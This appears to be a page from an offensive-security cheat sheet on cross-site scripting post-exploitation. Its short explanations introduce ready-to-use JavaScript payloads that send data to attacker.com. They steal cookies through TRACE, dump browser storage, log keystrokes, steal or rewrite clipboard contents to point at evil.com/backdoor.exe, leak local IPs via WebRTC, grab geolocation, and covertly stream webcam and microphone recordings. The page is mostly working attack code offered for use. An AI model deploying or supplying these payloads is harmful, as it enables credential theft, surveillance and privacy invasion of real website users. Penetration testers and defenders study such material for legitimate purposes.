📖 CyberBook

Appearance

</> Cross Site Scripting (XSS)

📚 Resources

🛠️ Tools

  • BeEF - Post exploit framework.

💥 Exploit

An XSS can lead to so much evil exploit like :

  • WebSocket revershell
  • Keylogger
  • Storage Stealing
  • Steal local file
  • Download evil binary
  • Mic / Cam Recorder
  • WebRTC => local IP
  • Geolocation
  • Crypto Miner
  • Internal Network Scanning

And very much more.

Cross Trace Scripting

HTTPOnly cookies aren't accessible via JavaScript but are still sent in every request. TRACE method echoes the full request back, allowing cookie exfiltration.

js
var xhr = new XMLHttpRequest();
xhr.onload = function () {
  fetch("//attacker.com", {
    method: "POST",
    body: xhr.getAllResponseHeaders(),
});
};
xhr.withCredentials = true;
xhr.open("TRACE", "/url", true); // \r\nTRACE might bypass some option filters
xhr.send();

Storage

js
// localStorage
fetch('//attacker.com/ls',{method:'POST',body:JSON.stringify(localStorage)})

// sessionStorage
fetch('//attacker.com/ss',{method:'POST',body:JSON.stringify(sessionStorage)})

⌨️ Keylogger

js
k=[];onkeyup=e=>{k.push(e.key);if(k.length>20){fetch('//attacker.com/key',{method:'POST',body:k.join('')});k=[]}}

Clipboard Hijacking

js
// Steal the content
document.addEventListener('copy',()=>{
  let s=document.getSelection().toString();
  fetch('//attacker.com/copy?d='+encodeURIComponent(s))
})
js
// Rewrite the paste content
document.addEventListener('paste',e=>{
  e.preventDefault();
  e.clipboardData.setData('text','https://evil.com/backdoor.exe');
})

🌐 WebRTC

js
let pc=new RTCPeerConnection({iceServers:[]});
pc.createDataChannel('');
pc.createOffer().then(o=>pc.setLocalDescription(o));
pc.onicecandidate=e=>{
  if(e.candidate){
    let ip=/([0-9]{1,3}\.){3}[0-9]{1,3}/.exec(e.candidate.candidate);
    if(ip) fetch('//attacker.com/ip?local='+ip[0])
  }
}

🌍 Geolocation

js
navigator.geolocation.getCurrentPosition(p=>{
  fetch('//attacker.com/gps?lat='+p.coords.latitude+'&lon='+p.coords.longitude)
})

🔴 Record

js
// Cam Recording
var v=document.createElement('video');
navigator.mediaDevices.enumerateDevices().then(d=>{
  if(d.find(d=>d.kind=='videoinput')){
    navigator.mediaDevices.getUserMedia({video:true}).then(stream=>{
      document.body.appendChild(v);
      v.srcObject=stream;v.play();
      setInterval(()=>{
        let c=document.createElement('canvas');
        c.width=v.videoWidth;c.height=v.videoHeight;
        c.getContext('2d').drawImage(v,0,0);
        c.toBlob(b=>fetch('//attacker.com/stream',{method:'POST',body:b}));
      },5000)
    })
  }
})
js
// Mic Recording
navigator.mediaDevices.getUserMedia({audio:true}).then(s=>{
  let r=new MediaRecorder(s);
  r.ondataavailable=e=>fetch('//attacker.com/audio_chunk',{method:'POST',body:e.data});
  r.start(3000)
})